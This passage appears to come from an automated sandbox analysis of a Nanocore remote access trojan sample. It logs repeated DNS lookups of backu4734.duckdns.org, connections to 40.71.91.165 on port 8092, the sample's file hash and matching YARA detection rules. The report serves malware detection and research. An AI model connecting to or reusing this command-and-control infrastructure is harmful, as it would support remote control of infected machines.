              Apr 8, 2021 17:22:21.731304884 CEST | 49721 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:25.789935112 CEST | 49722 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:25.893138885 CEST | 8092 | 49722 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:25.893244028 CEST | 49722 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:26.019073009 CEST | 49722 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:26.141273022 CEST | 8092 | 49722 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:26.141654015 CEST | 49722 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:26.245012045 CEST | 8092 | 49722 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:26.291915894 CEST | 49722 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:26.454382896 CEST | 8092 | 49722 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:26.525463104 CEST | 8092 | 49722 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:26.526390076 CEST | 49722 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:26.629293919 CEST | 8092 | 49722 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:26.630311012 CEST | 49722 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:26.734688044 CEST | 8092 | 49722 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:26.737920046 CEST | 49722 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:26.841434956 CEST | 8092 | 49722 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:26.841967106 CEST | 49722 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:26.995601892 CEST | 8092 | 49722 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:28.578849077 CEST | 49722 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:28.722454071 CEST | 8092 | 49722 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:29.575089931 CEST | 49722 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:33.792499065 CEST | 49725 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:33.895200968 CEST | 8092 | 49725 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:33.895311117 CEST | 49725 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:33.895756006 CEST | 49725 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:34.013356924 CEST | 8092 | 49725 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:34.013602972 CEST | 49725 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:34.118082047 CEST | 8092 | 49725 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:34.119051933 CEST | 49725 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:34.276753902 CEST | 8092 | 49725 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:34.623672962 CEST | 49725 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:34.694535017 CEST | 8092 | 49725 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:34.725605965 CEST | 8092 | 49725 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:34.725702047 CEST | 49725 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:34.874870062 CEST | 8092 | 49725 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:34.874937057 CEST | 49725 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:34.979576111 CEST | 8092 | 49725 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:35.027566910 CEST | 49725 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:35.045732975 CEST | 49725 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:35.129699945 CEST | 8092 | 49725 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:35.183841944 CEST | 49725 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:35.190817118 CEST | 8092 | 49725 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:35.692621946 CEST | 49725 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:35.845876932 CEST | 8092 | 49725 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:36.578648090 CEST | 49725 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:40.777899027 CEST | 49732 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:40.881186962 CEST | 8092 | 49732 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:40.886369944 CEST | 49732 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:40.959708929 CEST | 49732 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:41.083467007 CEST | 8092 | 49732 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:41.102648020 CEST | 49732 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:41.208287001 CEST | 8092 | 49732 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:41.340811968 CEST | 49732 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:41.357777119 CEST | 49732 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:41.514223099 CEST | 8092 | 49732 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:41.592376947 CEST | 49732 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:41.601032019 CEST | 8092 | 49732 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:41.697230101 CEST | 8092 | 49732 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:41.697544098 CEST | 49732 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:41.850414038 CEST | 8092 | 49732 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:41.850497961 CEST | 49732 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:41.953742981 CEST | 8092 | 49732 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:42.081522942 CEST | 49732 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:42.185002089 CEST | 8092 | 49732 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:42.246978045 CEST | 49732 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:42.575546980 CEST | 49732 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:42.725888014 CEST | 8092 | 49732 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:43.179671049 CEST | 8092 | 49732 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:43.231421947 CEST | 49732 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:43.575686932 CEST | 49732 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:47.671658993 CEST | 49733 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:47.773524046 CEST | 8092 | 49733 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:47.773603916 CEST | 49733 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:47.793126106 CEST | 49733 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:47.915505886 CEST | 8092 | 49733 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:47.922216892 CEST | 49733 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:48.024246931 CEST | 8092 | 49733 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:48.025274992 CEST | 49733 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:48.177838087 CEST | 8092 | 49733 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:48.258249998 CEST | 8092 | 49733 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:48.259007931 CEST | 49733 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:48.362921000 CEST | 8092 | 49733 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:48.370107889 CEST | 49733 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:48.472721100 CEST | 8092 | 49733 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:48.472809076 CEST | 49733 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:48.574872017 CEST | 8092 | 49733 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:48.592077971 CEST | 49733 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:48.742060900 CEST | 8092 | 49733 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:49.920128107 CEST | 49733 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:53.982947111 CEST | 49735 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:54.086538076 CEST | 8092 | 49735 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:54.086639881 CEST | 49735 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:54.113893032 CEST | 49735 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:54.235080004 CEST | 8092 | 49735 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:54.251106024 CEST | 49735 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:54.354547024 CEST | 8092 | 49735 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:54.355995893 CEST | 49735 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:54.509183884 CEST | 8092 | 49735 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:54.600794077 CEST | 8092 | 49735 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:54.637352943 CEST | 49735 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:54.742230892 CEST | 8092 | 49735 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:54.745676041 CEST | 49735 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:54.848886013 CEST | 8092 | 49735 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:54.849225998 CEST | 49735 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:54.952661991 CEST | 8092 | 49735 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:54.954638958 CEST | 49735 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:55.109117985 CEST | 8092 | 49735 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:55.734447956 CEST | 49735 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:22:55.889900923 CEST | 8092 | 49735 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:22:56.733232021 CEST | 49735 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:23:00.787394047 CEST | 49736 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:23:00.891832113 CEST | 8092 | 49736 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:23:00.891910076 CEST | 49736 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:23:00.892622948 CEST | 49736 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:23:01.012259007 CEST | 8092 | 49736 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:23:01.027307987 CEST | 49736 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:23:01.133057117 CEST | 8092 | 49736 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:23:01.186083078 CEST | 49736 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:23:01.990158081 CEST | 49736 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:23:02.149413109 CEST | 8092 | 49736 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:23:02.149579048 CEST | 49736 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:23:02.230698109 CEST | 8092 | 49736 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:23:02.252604961 CEST | 8092 | 49736 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:23:02.252705097 CEST | 49736 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:23:02.434218884 CEST | 49736 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:23:02.587645054 CEST | 8092 | 49736 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:23:02.587831974 CEST | 49736 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:23:02.693125010 CEST | 8092 | 49736 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:23:02.733082056 CEST | 49736 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:23:02.837759972 CEST | 8092 | 49736 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:23:02.889278889 CEST | 49736 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:23:03.046912909 CEST | 49736 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:23:03.201199055 CEST | 8092 | 49736 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:23:05.996118069 CEST | 8092 | 49736 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:23:06.046546936 CEST | 49736 | 8092 | 192.168.2.5 | 40.71.91.165
              Apr 8, 2021 17:23:10.194027901 CEST | 8092 | 49736 | 40.71.91.165 | 192.168.2.5
              Apr 8, 2021 17:23:10.249382019 CEST | 49736 | 8092 | 192.168.2.5 | 40.71.91.165

              UDP Packets

              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Apr 8, 2021 17:20:52.777942896 CEST | 65307 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:20:52.792874098 CEST | 53 | 65307 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:20:52.908107042 CEST | 64344 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:20:52.920916080 CEST | 53 | 64344 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:20:53.738787889 CEST | 62060 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:20:53.753365040 CEST | 53 | 62060 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:20:54.499186993 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:20:54.512229919 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:20:54.952914000 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:20:54.971004009 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:21:03.811711073 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:21:03.824161053 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:21:04.628942966 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:21:04.642151117 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:21:06.808931112 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:21:06.822011948 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:21:07.621742010 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:21:07.634968996 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:21:09.236407995 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:21:09.249181986 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:21:16.772994041 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:21:16.785816908 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:21:17.609308958 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:21:17.623075962 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:21:19.230293989 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:21:19.411761999 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:21:20.604794979 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:21:20.645472050 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:21:29.107058048 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:21:29.293220043 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:21:34.792303085 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:21:34.808309078 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:21:41.324934959 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:21:41.338340998 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:21:44.674228907 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:21:44.686163902 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:21:48.354012966 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:21:48.535795927 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:21:55.362834930 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:21:55.377132893 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:21:57.871968031 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:21:57.891774893 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:22:01.625776052 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:22:01.638365984 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:22:07.701024055 CEST | 54791 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:22:07.714009047 CEST | 53 | 54791 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:22:14.676337957 CEST | 50463 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:22:14.888746977 CEST | 53 | 50463 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:22:19.713126898 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:22:19.727790117 CEST | 53 | 50394 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:22:25.775541067 CEST | 58530 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:22:25.788817883 CEST | 53 | 58530 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:22:31.701319933 CEST | 53813 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:22:31.715224028 CEST | 53 | 53813 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:22:33.610249043 CEST | 63732 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:22:33.791585922 CEST | 53 | 63732 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:22:34.250060081 CEST | 57344 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:22:34.270764112 CEST | 53 | 57344 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:22:39.213460922 CEST | 54450 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:22:39.231551886 CEST | 53 | 54450 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:22:40.763470888 CEST | 59261 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:22:40.776850939 CEST | 53 | 59261 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:22:47.613575935 CEST | 57151 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:22:47.627650023 CEST | 53 | 57151 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:22:51.380856037 CEST | 59413 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:22:51.408750057 CEST | 53 | 59413 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:22:53.967757940 CEST | 60516 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:22:53.981085062 CEST | 53 | 60516 | 8.8.8.8 | 192.168.2.5
              Apr 8, 2021 17:23:00.772382021 CEST | 51649 | 53 | 192.168.2.5 | 8.8.8.8
              Apr 8, 2021 17:23:00.785746098 CEST | 53 | 51649 | 8.8.8.8 | 192.168.2.5

              DNS Queries

              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
              Apr 8, 2021 17:21:19.230293989 CEST | 192.168.2.5 | 8.8.8.8 | 0x42a | Standard query (0) | backu4734.duckdns.org | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:21:29.107058048 CEST | 192.168.2.5 | 8.8.8.8 | 0x22b0 | Standard query (0) | backu4734.duckdns.org | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:21:34.792303085 CEST | 192.168.2.5 | 8.8.8.8 | 0x6924 | Standard query (0) | backu4734.duckdns.org | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:21:41.324934959 CEST | 192.168.2.5 | 8.8.8.8 | 0xc909 | Standard query (0) | backu4734.duckdns.org | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:21:48.354012966 CEST | 192.168.2.5 | 8.8.8.8 | 0x1522 | Standard query (0) | backu4734.duckdns.org | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:21:55.362834930 CEST | 192.168.2.5 | 8.8.8.8 | 0xbe28 | Standard query (0) | backu4734.duckdns.org | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:22:01.625776052 CEST | 192.168.2.5 | 8.8.8.8 | 0xb9fe | Standard query (0) | backu4734.duckdns.org | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:22:07.701024055 CEST | 192.168.2.5 | 8.8.8.8 | 0x8a6 | Standard query (0) | backu4734.duckdns.org | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:22:14.676337957 CEST | 192.168.2.5 | 8.8.8.8 | 0xd02a | Standard query (0) | backu4734.duckdns.org | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:22:19.713126898 CEST | 192.168.2.5 | 8.8.8.8 | 0xab6a | Standard query (0) | backu4734.duckdns.org | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:22:25.775541067 CEST | 192.168.2.5 | 8.8.8.8 | 0xafbf | Standard query (0) | backu4734.duckdns.org | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:22:33.610249043 CEST | 192.168.2.5 | 8.8.8.8 | 0x47e1 | Standard query (0) | backu4734.duckdns.org | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:22:40.763470888 CEST | 192.168.2.5 | 8.8.8.8 | 0x9db0 | Standard query (0) | backu4734.duckdns.org | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:22:47.613575935 CEST | 192.168.2.5 | 8.8.8.8 | 0x6edc | Standard query (0) | backu4734.duckdns.org | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:22:53.967757940 CEST | 192.168.2.5 | 8.8.8.8 | 0x116f | Standard query (0) | backu4734.duckdns.org | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:23:00.772382021 CEST | 192.168.2.5 | 8.8.8.8 | 0x73b1 | Standard query (0) | backu4734.duckdns.org | A (IP address) | IN (0x0001)

              DNS Answers

              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
              Apr 8, 2021 17:21:19.411761999 CEST | 8.8.8.8 | 192.168.2.5 | 0x42a | No error (0) | backu4734.duckdns.org |  | 40.71.91.165 | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:21:29.293220043 CEST | 8.8.8.8 | 192.168.2.5 | 0x22b0 | No error (0) | backu4734.duckdns.org |  | 40.71.91.165 | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:21:34.808309078 CEST | 8.8.8.8 | 192.168.2.5 | 0x6924 | No error (0) | backu4734.duckdns.org |  | 40.71.91.165 | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:21:41.338340998 CEST | 8.8.8.8 | 192.168.2.5 | 0xc909 | No error (0) | backu4734.duckdns.org |  | 40.71.91.165 | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:21:48.535795927 CEST | 8.8.8.8 | 192.168.2.5 | 0x1522 | No error (0) | backu4734.duckdns.org |  | 40.71.91.165 | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:21:55.377132893 CEST | 8.8.8.8 | 192.168.2.5 | 0xbe28 | No error (0) | backu4734.duckdns.org |  | 40.71.91.165 | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:22:01.638365984 CEST | 8.8.8.8 | 192.168.2.5 | 0xb9fe | No error (0) | backu4734.duckdns.org |  | 40.71.91.165 | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:22:07.714009047 CEST | 8.8.8.8 | 192.168.2.5 | 0x8a6 | No error (0) | backu4734.duckdns.org |  | 40.71.91.165 | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:22:14.888746977 CEST | 8.8.8.8 | 192.168.2.5 | 0xd02a | No error (0) | backu4734.duckdns.org |  | 40.71.91.165 | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:22:19.727790117 CEST | 8.8.8.8 | 192.168.2.5 | 0xab6a | No error (0) | backu4734.duckdns.org |  | 40.71.91.165 | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:22:25.788817883 CEST | 8.8.8.8 | 192.168.2.5 | 0xafbf | No error (0) | backu4734.duckdns.org |  | 40.71.91.165 | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:22:33.791585922 CEST | 8.8.8.8 | 192.168.2.5 | 0x47e1 | No error (0) | backu4734.duckdns.org |  | 40.71.91.165 | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:22:40.776850939 CEST | 8.8.8.8 | 192.168.2.5 | 0x9db0 | No error (0) | backu4734.duckdns.org |  | 40.71.91.165 | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:22:47.627650023 CEST | 8.8.8.8 | 192.168.2.5 | 0x6edc | No error (0) | backu4734.duckdns.org |  | 40.71.91.165 | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:22:53.981085062 CEST | 8.8.8.8 | 192.168.2.5 | 0x116f | No error (0) | backu4734.duckdns.org |  | 40.71.91.165 | A (IP address) | IN (0x0001)
              Apr 8, 2021 17:23:00.785746098 CEST | 8.8.8.8 | 192.168.2.5 | 0x73b1 | No error (0) | backu4734.duckdns.org |  | 40.71.91.165 | A (IP address) | IN (0x0001)

              Code Manipulations

              Statistics

              CPU Usage

              Memory Usage

              High Level Behavior Distribution

              Behavior

              System Behavior

              General

              Start time:17:20:58
              Start date:08/04/2021
              Path:C:\Users\user\Desktop\bGf2H3tXGg.exe
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\Desktop\bGf2H3tXGg.exe'
              Imagebase:0x400000
              File size:702907 bytes
              MD5 hash:F72A7FD231E50F9B43C3DAB470364846
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              General

              Start time:17:21:09
              Start date:08/04/2021
              Path:C:\Users\user\Desktop\bGf2H3tXGg.exe
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\Desktop\bGf2H3tXGg.exe'
